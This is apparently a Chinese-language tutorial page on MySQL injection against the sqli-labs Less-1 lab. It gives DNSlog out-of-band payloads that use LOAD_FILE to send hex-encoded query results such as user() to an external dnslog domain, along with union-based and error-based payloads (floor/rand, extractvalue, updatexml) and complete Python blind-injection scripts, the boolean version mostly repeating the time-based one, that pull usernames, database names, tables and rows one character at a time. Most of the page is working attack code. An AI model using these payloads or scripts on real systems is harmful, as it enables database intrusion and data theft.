mysql注入之dnslog盲注加速

#拼接域名
select concat(version(),’.0535code.com’) #返回 5.5.53.0535code.com

#注意
1.域名前缀长度限制在63个字符,解决办法是用mid()函数来获取。
2.域名前缀不支持一些特殊字符,如*,解决办法是用hex()或者其他加密函数,获取到数据后再解密。

#读取文件时会解析dns协议
load_file()

#使用T00ls dnslog,或者自己找别的。
您的查询记录是t00ls.052d281fb2a9087f771cb57f7d5f02ad.tu4.org(怎么使用,自己领悟)
#测试
ping t00ls.052d281fb2a9087f771cb57f7d5f02ad.tu4.org

mysql特殊性

#启动apache
D:\phpStudy\Apache\bin\httpd.exe

#启动mysql 5.5.53之后版本,5.5.53之前的版本不需要
D:\phpStudy\MySQL\bin>mysqld.exe –secure-file-priv=
或者配置文件my.ini加入 secure-file-priv=

#构造exp
SELECT LOAD_FILE(CONCAT(‘\\\\’,(select hex(user())),’.t00ls.052d281fb2a9087f771cb57f7d5f02ad.tu4.org\\abc’))

#汇总常用函数
version() #获取mysql版本号
user() #返回当前用户名
select count(*) from mysql.user #返回用户数量
select count(*) from information_schema.schemata #返回数据库数量
database() #返回数据库名
select table_name from information_schema.tables where table_schema=’security’ limit 0,1 #获取第一个表名
select column_name from information_schema.columns where table_schema=’security’ and TABLE_NAME=’emails’ limit 0,1 #获取第一个字段名
select id from emails limit 0,1 #获取第一个字段名

mysql注入之时间延迟注入

#时间延迟盲注 与 布尔类型盲注 相似

#睡眠函数
sleep()

#手工测试
http://127.0.0.4/Less-1/index.php?id=1′ and sleep(0) –+
http://127.0.0.4/Less-1/index.php?id=1′ and sleep(10) –+
两者对比明显有延迟

# coding=utf-8
import requests
import time

#解决编码问题
import sys  
reload(sys)  
sys.setdefaultencoding('utf8')  


"""
取出特征
#if(条件,是,否),sleep放前面和后面的区别,放后面 条件不对就延迟是不机智的
#调试下面语句,说明如果 条件成立 则打开页面会出现延迟
#select if(ord(mid(version(),1,1))>=53,sleep(5),0)
"""

   
#sql盲注测试类
class Sql_bool():
    #主机头
    header = {
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding":"gzip, deflate, br",
        "Cookie":"PHPSESSID=op3mp10kotct1hvfa8a6g6ko14",
        "Connection":"close",
        "Upgrade-Insecure-Requests":"1",
    }
    #注入点
    host = "http://127.0.0.4/Less-1/index.php?id=1"

    #根据特征判断返回真假
    def html_bool(self,bool_sql):
        #传入布尔类型条件 bool_sql

        #拼接注入url
        #url = self.host + "\' and " + bool_sql + " --+"
        url = self.host + "\' and if(" + bool_sql + ",sleep(5),0) --+"
        print url


        ###############修改为布尔类型#################
        #记录开始时间
        time_star=time.time()
        #开始请求
        html = requests.get(url = url,headers = self.header).content
        #记录结束时间
        end_time=time.time()

        #取得打开页面时间差
        sleep_time = end_time - time_star
        #判断是否延迟

        #延迟时间不能太小,容易误报,也不能太大,时间较长
        if sleep_time>=5:
            print "success"
            return True
        else:
            print "error"
            return False


    #判断数据库版本确定索引表
    def get_version(self):
        #判断数据库版本 SELECT ord(mid(version(),1,1))
        #5的ascii码值是 53
        bool_sql = "ord(mid(version(),1,1))>=53"
        self.html_bool(bool_sql)

    #判断数据库用户权限
    def get_user_first(self):
        #判断数据库用户权限:
        #返回正常说明为root,这样是判断第一个字母r,可能是root账户,不能完全证明 root 权限,权限表Y
        #r的ascii码值是 114
        bool_sql = "ord(mid(user(),1,1))=114"
        self.html_bool(bool_sql)


    #判断数据库用户数量
    def get_user_count(self):
        bool_sql = "(select count(*) from mysql.user)=3"
        self.html_bool(bool_sql)


    #判断数据库用户长度
    def get_user_len(self):
        #判断数据库用户长度
        #返回的是用户@主机名的长度 root@localhost
        bool_sql = "Length(user())=14"
        self.html_bool(bool_sql)


    #判断数据库当前用户名
    def get_user(self):
        #定义返回的字符串
        result = ""
        #bool_sql = "ord(mid(user(),1,1))=1"
        for i in xrange(1,14+1):
            #bool_sql = "ord(mid(user(),1,1))=114" 取有效ascii码48,122
            for j in xrange(48,122):
                #理解mid函数,当 mid后是字符串,用ascii码转化为ascii码时取第一个字母的ascii码
                bool_sql = "ord(mid(user(),%d,14))=%d" % (i,j)
                #如果返回真
                if self.html_bool(bool_sql):
                    #打印asscii码对应的字符串
                    result = result + chr(j)
                    print j,chr(j),result
        else:
            print u"用户名为:",result


    #判断数据库数量
    def get_db_count(self):
        bool_sql = "(select count(*) from information_schema.schemata)=15"
        self.html_bool(bool_sql)
        #使用 SELECT * FROM SCHEMATA limit 3,1 遍历表明
        # limit 从第几个开始,返回几个


    #判断数据库名长度
    def get_db_len(self):
        #判断数据库用户长度
        #返回的是用户@主机名的长度 root@localhost
        bool_sql = "Length(database())=8"
        self.html_bool(bool_sql)            


    #判断数据库名称 security
    def get_database(self):
        #定义返回的字符串
        result = ""
        for i in xrange(1,8+1):
            #取有效ascii码48,122
            for j in xrange(48,122):
                bool_sql = "ord(mid(database(),%d,8))=%d" % (i,j)
                #如果返回真
                if self.html_bool(bool_sql):
                    #打印asscii码对应的字符串
                    result = result + chr(j)
                    print j,chr(j),result
        else:
            print u"数据库名为:",result

    #判断表名长度,上面跑出数据库了,security
    def get_table_len(self):
        #pass
        #select length(table_name) from information_schema.tables where table_schema='security' limit 0,1
        bool_sql = "(select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6"
        self.html_bool(bool_sql)

    #获取表名
    def get_table(self):
        #定义返回的字符串
        result = ""
        for i in xrange(1,6+1):
            #取有效ascii码48,122
            for j in xrange(48,122):        
                bool_sql = "ord(mid(   (select table_name from information_schema.tables where table_schema='security' limit 0,1)   ,%d,6) )=%d" % (i,j)
                #如果返回真
                if self.html_bool(bool_sql):
                    #打印asscii码对应的字符串
                    result = result + chr(j)
                    print j,chr(j),result
        else:
            print u"第一个表名为:",result      

    #获取字段名长度
    def get_columns_len(self):
        #pass
        #select length(column_name) from information_schema.columns where table_schema='security' and TABLE_NAME='emails' limit 0,1
        bool_sql = "(select length(column_name) from information_schema.columns where table_schema='security' and TABLE_NAME='emails' limit 0,1)=2"
        self.html_bool(bool_sql)

    #获取字段名
    def get_columns(self):
        #定义返回的字符串
        result = ""
        for i in xrange(1,2+1):
            #取有效ascii码48,122
            for j in xrange(48,122):        
                bool_sql = "ord(mid(   (select column_name from information_schema.columns where table_schema='security' and TABLE_NAME='emails' limit 0,1)   ,%d,2) )=%d" % (i,j)
                #如果返回真
                if self.html_bool(bool_sql):
                    #打印asscii码对应的字符串
                    result = result + chr(j)
                    print j,chr(j),result
        else:
            print u"第一个字段名为:",result        
   
    #获取字段内容,字段长度假设是5,按照上面方法获取字段内容长度
    def get_content(self):
        #pass
        #select id from emails limit 0,1
        #定义返回的字符串
        result = ""
        for i in xrange(1,5):
            #取有效ascii码48,122
            for j in xrange(48,122):        
                bool_sql = "ord(mid(   (select id from emails limit 0,1)   ,%d,5) )=%d" % (i,j)
                #如果返回真
                if self.html_bool(bool_sql):
                    #打印asscii码对应的字符串
                    result = result + chr(j)
                    print j,chr(j),result
        else:
            print u"第一列第一个字段内容为:",result    
   
    #16进制获取中文数据
    #修改第二个字段为中文,获取盲注时 中文的内容,把email_id第一个字段值改为  你好
    def get_china_content(self):
        #pass
        #select hex(email_id) from emails limit 0,1 返回 C4E3BAC3
        #定义返回的字符串
        result = ""
        for i in xrange(1,10):
            #取有效ascii码48,122
            for j in xrange(48,122):        
                bool_sql = "ord(mid(   (select hex(email_id) from emails limit 0,1)   ,%d,10) )=%d" % (i,j)
                #如果返回真
                if self.html_bool(bool_sql):
                    #打印asscii码对应的字符串
                    result = result + chr(j)
                    print j,chr(j),result
        else:
            print u"测试取中文内容的16进制为:",result
        #解16进制中文内容,在控制台打开显示    
        print "\xC4\xE3\xBA\xC3"
        #在中文与英文等混合的情况下,先用16个字母和特殊字符做对比,如果获取不到再用中文,sqlmap之所以跑出乱码,是在解码时没解好!
        #SELECT HEX(  '你是ss' ) + py测试乱码问题,解决sqlma编码问题
        #print "\xE4\xBD\xA0\xE6\x98\xAF".decode("utf")

       
    #提高sql注入效率
    #二分算法 使用(+多线程+dnslog)
    def BinarySearch(self,low,height,key):
        #强制类型转换
        low = int(low) #最小值
        height = int(height) #最大值
        #初始化 中间值
        mid = ''
        #消息循环
        while True :
            #获取中间值
            mid = (low+height)/2
            print u"长度",key,u" ------- 正在分值",mid,low,height  
            #分到最后时,最小值和最大值相等
            if mid == low :
                #把中间值转换为ascii嘛输出,因为<= 所以需要 +1
                result = chr(mid+1)
                print time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),"[+]",mid+1,result
                return True
            #判断取得值是否 小于等于最小值
            elif int(key) <= int(mid):
                #把中间值给最大值
                height = mid
            else :
                #如果不是的话把 中间值给最小值
                low = mid  

    #二分法获取数据库名实例
    def BinarySearch_update(self):
        #初始化结果
        global test
        test = ''

        #循环遍历9个长度的数据名
        for i in xrange(1,9):
            #强制类型转换
            low = 48 #最小值
            height = 122 #最大值
            #初始化 中间值
            mid = ''
            #消息循环
            while True :
                #获取中间值
                mid = (low+height)/2
                #sql标识,之前是等于,现在是小于等于 二分法
                bool_sql = "ord(mid(database(),%d,8))<=%d" % (i,mid)
                print u"长度9",u" ------- 正在分值",mid,low,height
                #time.sleep(1)  
                #分到最后时,最小值和最大值相等
                if mid == low :
                    #把中间值转换为ascii嘛输出,因为<= 所以需要 +1
                    result = chr(mid+1)
                    print time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),"[+]",mid+1,result
                    test = test + result
                    break
                    #return True
                #判断取得值是否 小于等于最小值
                elif self.html_bool(bool_sql):
                    #把中间值给最大值
                    height = mid
                else :
                    #如果不是的话把 中间值给最小值
                    low = mid
        else :
            print  test

    ##多线程+队列 提高速度,判断表前缀提高速度等等

test = Sql_bool()
#test.get_version() #获取版本号
#test.get_user_first() #获取数据库用户权限
#test.get_user_count() #获取数据库用户数量
#test.get_user_len() #获取数据库用户长度
#test.get_user() #获取数据库当前用户名
#test.get_db_count() #获取数据库数量
#test.get_db_len() #获取数据库长度
#test.get_database() #获取数据库名
#test.get_table_len() #获取表名长度
#test.get_table() #获取表名
#test.get_columns_len() #获取字段名长度
#test.get_columns() #获取字段名
#test.get_content() #获取第一列第一个字段内容
#test.get_china_content() #获取中文内容

#test.BinarySearch(0,127,55) #二分法快速查找实例
#test.BinarySearch_update() # 二分法获取数据库名实例

mysql注入之union联合查询注入

#union all 和 union 区别
union all是直接连接,取到得是所有值,记录可能有重复
union 是取唯一值,记录没有重复

#union 联合查询,前后字段数量应该保持一致,否则提示列数不一致
The used SELECT statements have a different number of columns

#依次测试,到3返回正常,说明有3列
http://127.0.0.4/Less-1/index.php?id=1′ union all select 1 –+
http://127.0.0.4/Less-1/index.php?id=1′ union all select 1,2 –+
http://127.0.0.4/Less-1/index.php?id=1′ union all select 1,2,3 –+

#怎么爆出数据呢?要id不存在,返回后面的值
http://127.0.0.4/Less-1/index.php?id=1111′ union all select 1,2,3 –+

#可以看到显示字段的位置,把对应的字段换成以下函数,即可爆库

比如:
http://127.0.0.4/Less-1/index.php?id=1111′ union all select 1,database(),3 –+

#汇总常用函数
version() #获取mysql版本号
user() #返回当前用户名
select count(*) from mysql.user #返回用户数量
select count(*) from information_schema.schemata #返回数据库数量
database() #返回数据库名
select table_name from information_schema.tables where table_schema=’security’ limit 0,1 #获取第一个表名
select column_name from information_schema.columns where table_schema=’security’ and TABLE_NAME=’emails’ limit 0,1 #获取第一个字段名
select id from emails limit 0,1 #获取第一个字段名

#####使用 order by 判断列数,也可结合其他注入方式结合利用#

#判断数据库当前表有几列
http://127.0.0.4/Less-1/index.php?id=1′ order by 1,2,3,4 –+

拼接起来就是
SELECT * FROM users WHERE id=’1′ order by 1,2,3,4 –+’ LIMIT 0,1

当是三个字段正常,增加到4则报错,第四个不存在
SELECT * FROM users WHERE id=’1′ order by 1,2,3

mysql注入之报错注入

1.floor()

#取整函数floor()
floor(5.1) 返回5

#查看rand()函数返回值,*2取整永远是1个整数,在获取时去掉最后一个字符即可
select rand(0),floor(rand(0)*2)

#查看concat()连接函数
select concat(user(),floor(rand(0)*2)) 返回 root@localhost0

#构造报错语句
select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a

#拼接sql语句到后端

http://127.0.0.4/Less-1/index.php?id=1′ and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) –+

#汇总常用函数
version() #获取mysql版本号
user() #返回当前用户名
select count(*) from mysql.user #返回用户数量
Length(user()) #返回用户名长度
select count(*) from information_schema.schemata #返回数据库数量
Length(database()) #返回数据库长度
database() #返回数据库名
select length(table_name) from information_schema.tables where table_schema=’security’ limit 0,1 #获取第一个表名长度
select table_name from information_schema.tables where table_schema=’security’ limit 0,1 #获取第一个表名
select length(column_name) from information_schema.columns where table_schema=’security’ and TABLE_NAME=’emails’ limit 0,1 #获取第一个字段长度
select column_name from information_schema.columns where table_schema=’security’ and TABLE_NAME=’emails’ limit 0,1 #获取第一个字段名
select id from emails limit 0,1 #获取第一个字段名

2.extractvalue()

#函数原型
#EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式
第二个参数:XPath_string (Xpath格式的字符串)

#使用方式
select extractvalue(“666“, “/html”) #返回666

#使用extractvalue报错,以16进制0x7e,就是~符号,去掉头~和尾~获取中间值
select (extractvalue(1,concat(0x7e,(select user()),0x7e)))

#构造报错语句
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))

#拼接sql语句到后端
http://127.0.0.4/Less-1/index.php?id=1′ and (extractvalue(1,concat(0x7e,(select user()),0x7e))) –+

3.updatexml()

#函数原型,更新xml
#UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式
第二个参数:XPath_string
第三个参数:new_value

#与 extractvalue() 函数区别是 第三个参数替换了节点字符串,返回值是整个改变后的XML文档

#使用方式
select updatexml(“666“, “/html”,”888″) #返回888

#使用updatexml报错,以16进制0x7e,就是~符号,去掉头~和尾~获取中间值
select (updatexml(1,concat(0x7e,(select user()),0x7e),1))

#构造报错语句
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))

#拼接sql语句到后端
http://127.0.0.4/Less-1/index.php?id=1′ and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) –+

============================================================
还有其他的报错注入,原理都是类似的,构造报错语句报错显示信息;

mysql注入之布尔类型盲注py脚本

查找布尔类型标识,取出特征,sql布尔类型盲注测试类

手工+脚本自动化注入原理

#test.get_version() #获取版本号
#test.get_user_first() #获取数据库用户权限
#test.get_user_count() #获取数据库用户数量
#test.get_user_len() #获取数据库用户长度
#test.get_user() #获取数据库当前用户名
#test.get_db_count() #获取数据库数量
#test.get_db_len() #获取数据库长度
#test.get_database() #获取数据库名
#test.get_table_len() #获取表名长度
#test.get_table() #获取表名
#test.get_columns_len() #获取字段名长度
#test.get_columns() #获取字段名
#test.get_content() #获取第一列第一个字段内容
#test.get_china_content() #获取中文内容

#test.BinarySearch(0,127,55) #二分法快速查找实例
#test.BinarySearch_update() # 二分法获取数据库名实例

# coding=utf-8
import requests
import time

#解决编码问题
import sys  
reload(sys)  
sys.setdefaultencoding('utf8')  


"""
取出特征
1' and '1'='1  #返回真,Password
1' and '1'='2  #返回假
这里条件 and or xor 根据实际逻辑来
"""

   
#sql盲注测试类
class Sql_bool():
    #主机头
    header = {
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding":"gzip, deflate, br",
        "Cookie":"PHPSESSID=op3mp10kotct1hvfa8a6g6ko14",
        "Connection":"close",
        "Upgrade-Insecure-Requests":"1",
    }
    #注入点
    host = "http://127.0.0.4/Less-1/index.php?id=1"

    #根据特征判断返回真假
    def html_bool(self,bool_sql):
        #传入布尔类型条件 bool_sql

        #拼接注入url
        url = self.host + "\' and " + bool_sql + " --+"
        print url
        html = requests.get(url = url,headers = self.header).content
        if "Password" in html:
            print "success"
            return True
        else:
            print "error"
            return False


    #判断数据库版本确定索引表
    def get_version(self):
        #判断数据库版本 SELECT ord(mid(version(),1,1))
        #5的ascii码值是 53
        bool_sql = "ord(mid(version(),1,1))>=53"
        self.html_bool(bool_sql)

    #判断数据库用户权限
    def get_user_first(self):
        #判断数据库用户权限:
        #返回正常说明为root,这样是判断第一个字母r,可能是root账户,不能完全证明 root 权限,权限表Y
        #r的ascii码值是 114
        bool_sql = "ord(mid(user(),1,1))=114"
        self.html_bool(bool_sql)


    #判断数据库用户数量
    def get_user_count(self):
        bool_sql = "(select count(*) from mysql.user)=3"
        self.html_bool(bool_sql)


    #判断数据库用户长度
    def get_user_len(self):
        #判断数据库用户长度
        #返回的是用户@主机名的长度 root@localhost
        bool_sql = "Length(user())=14"
        self.html_bool(bool_sql)


    #判断数据库当前用户名
    def get_user(self):
        #定义返回的字符串
        result = ""
        #bool_sql = "ord(mid(user(),1,1))=1"
        for i in xrange(1,14+1):
            #bool_sql = "ord(mid(user(),1,1))=114" 取有效ascii码48,122
            for j in xrange(48,122):
                #理解mid函数,当 mid后是字符串,用ascii码转化为ascii码时取第一个字母的ascii码
                bool_sql = "ord(mid(user(),%d,14))=%d" % (i,j)
                #如果返回真
                if self.html_bool(bool_sql):
                    #打印asscii码对应的字符串
                    result = result + chr(j)
                    print j,chr(j),result
        else:
            print u"用户名为:",result


    #判断数据库数量
    def get_db_count(self):
        bool_sql = "(select count(*) from information_schema.schemata)=15"
        self.html_bool(bool_sql)
        #使用 SELECT * FROM SCHEMATA limit 3,1 遍历表明
        # limit 从第几个开始,返回几个


    #判断数据库名长度
    def get_db_len(self):
        #判断数据库用户长度
        #返回的是用户@主机名的长度 root@localhost
        bool_sql = "Length(database())=8"
        self.html_bool(bool_sql)            


    #判断数据库名称 security
    def get_database(self):
        #定义返回的字符串
        result = ""
        for i in xrange(1,8+1):
            #取有效ascii码48,122
            for j in xrange(48,122):
                bool_sql = "ord(mid(database(),%d,8))=%d" % (i,j)
                #如果返回真
                if self.html_bool(bool_sql):
                    #打印asscii码对应的字符串
                    result = result + chr(j)
                    print j,chr(j),result
        else:
            print u"数据库名为:",result

    #判断表名长度,上面跑出数据库了,security
    def get_table_len(self):
        #pass
        #select length(table_name) from information_schema.tables where table_schema='security' limit 0,1
        bool_sql = "(select length(table_name) from information_schema.tables where table_schema='security' limit 0,1)=6"
        self.html_bool(bool_sql)

    #获取表名
    def get_table(self):
        #定义返回的字符串
        result = ""
        for i in xrange(1,6+1):
            #取有效ascii码48,122
            for j in xrange(48,122):        
                bool_sql = "ord(mid(   (select table_name from information_schema.tables where table_schema='security' limit 0,1)   ,%d,6) )=%d" % (i,j)
                #如果返回真
                if self.html_bool(bool_sql):
                    #打印asscii码对应的字符串
                    result = result + chr(j)
                    print j,chr(j),result
        else:
            print u"第一个表名为:",result      

    #获取字段名长度
    def get_columns_len(self):
        #pass
        #select length(column_name) from information_schema.columns where table_schema='security' and TABLE_NAME='emails' limit 0,1
        bool_sql = "(select length(column_name) from information_schema.columns where table_schema='security' and TABLE_NAME='emails' limit 0,1)=2"
        self.html_bool(bool_sql)

    #获取字段名
    def get_columns(self):
        #定义返回的字符串
        result = ""
        for i in xrange(1,2+1):
            #取有效ascii码48,122
            for j in xrange(48,122):        
                bool_sql = "ord(mid(   (select column_name from information_schema.columns where table_schema='security' and TABLE_NAME='emails' limit 0,1)   ,%d,2) )=%d" % (i,j)
                #如果返回真
                if self.html_bool(bool_sql):
                    #打印asscii码对应的字符串
                    result = result + chr(j)
                    print j,chr(j),result
        else:
            print u"第一个字段名为:",result        
   
    #获取字段内容,字段长度假设是5,按照上面方法获取字段内容长度
    def get_content(self):
        #pass
        #select id from emails limit 0,1
        #定义返回的字符串
        result = ""
        for i in xrange(1,5):
            #取有效ascii码48,122
            for j in xrange(48,122):        
                bool_sql = "ord(mid(   (select id from emails limit 0,1)   ,%d,5) )=%d" % (i,j)
                #如果返回真
                if self.html_bool(bool_sql):
                    #打印asscii码对应的字符串
                    result = result + chr(j)
                    print j,chr(j),result
        else:
            print u"第一列第一个字段内容为:",result    
   
    #16进制获取中文数据
    #修改第二个字段为中文,获取盲注时 中文的内容,把email_id第一个字段值改为  你好
    def get_china_content(self):
        #pass
        #select hex(email_id) from emails limit 0,1 返回 C4E3BAC3
        #定义返回的字符串
        result = ""
        for i in xrange(1,10):
            #取有效ascii码48,122
            for j in xrange(48,122):        
                bool_sql = "ord(mid(   (select hex(email_id) from emails limit 0,1)   ,%d,10) )=%d" % (i,j)
                #如果返回真
                if self.html_bool(bool_sql):
                    #打印asscii码对应的字符串
                    result = result + chr(j)
                    print j,chr(j),result
        else:
            print u"测试取中文内容的16进制为:",result
        #解16进制中文内容,在控制台打开显示    
        print "\xC4\xE3\xBA\xC3"
        #在中文与英文等混合的情况下,先用16个字母和特殊字符做对比,如果获取不到再用中文,sqlmap之所以跑出乱码,是在解码时没解好!
        #SELECT HEX(  '你是ss' ) + py测试乱码问题,解决sqlma编码问题
        #print "\xE4\xBD\xA0\xE6\x98\xAF".decode("utf")

       
    #提高sql注入效率
    #二分算法 使用(+多线程+dnslog)
    def BinarySearch(self,low,height,key):
        #强制类型转换
        low = int(low) #最小值
        height = int(height) #最大值
        #初始化 中间值
        mid = ''
        #消息循环
        while True :
            #获取中间值
            mid = (low+height)/2
            print u"长度",key,u" ------- 正在分值",mid,low,height  
            #分到最后时,最小值和最大值相等
            if mid == low :
                #把中间值转换为ascii嘛输出,因为<= 所以需要 +1
                result = chr(mid+1)
                print time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),"[+]",mid+1,result
                return True
            #判断取得值是否 小于等于最小值
            elif int(key) <= int(mid):
                #把中间值给最大值
                height = mid
            else :
                #如果不是的话把 中间值给最小值
                low = mid  

    #二分法获取数据库名实例
    def BinarySearch_update(self):
        #初始化结果
        global test
        test = ''

        #循环遍历9个长度的数据名
        for i in xrange(1,9):
            #强制类型转换
            low = 48 #最小值
            height = 122 #最大值
            #初始化 中间值
            mid = ''
            #消息循环
            while True :
                #获取中间值
                mid = (low+height)/2
                #sql标识,之前是等于,现在是小于等于 二分法
                bool_sql = "ord(mid(database(),%d,8))<=%d" % (i,mid)
                print u"长度9",u" ------- 正在分值",mid,low,height
                #time.sleep(1)  
                #分到最后时,最小值和最大值相等
                if mid == low :
                    #把中间值转换为ascii嘛输出,因为<= 所以需要 +1
                    result = chr(mid+1)
                    print time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),"[+]",mid+1,result
                    test = test + result
                    break
                    #return True
                #判断取得值是否 小于等于最小值
                elif self.html_bool(bool_sql):
                    #把中间值给最大值
                    height = mid
                else :
                    #如果不是的话把 中间值给最小值
                    low = mid
        else :
            print  test

    ##多线程+队列 提高速度,判断表前缀提高速度等等

test = Sql_bool()
#test.get_version() #获取版本号
#test.get_user_first() #获取数据库用户权限
#test.get_user_count() #获取数据库用户数量
#test.get_user_len() #获取数据库用户长度
#test.get_user() #获取数据库当前用户名
#test.get_db_count() #获取数据库数量
#test.get_db_len() #获取数据库长度
#test.get_database() #获取数据库名
#test.get_table_len() #获取表名长度
#test.get_table() #获取表名
#test.get_columns_len() #获取字段名长度
#test.get_columns() #获取字段名
#test.get_content() #获取第一列第一个字段内容
#test.get_china_content() #获取中文内容

#test.BinarySearch(0,127,55) #二分法快速查找实例
#test.BinarySearch_update() # 二分法获取数据库名实例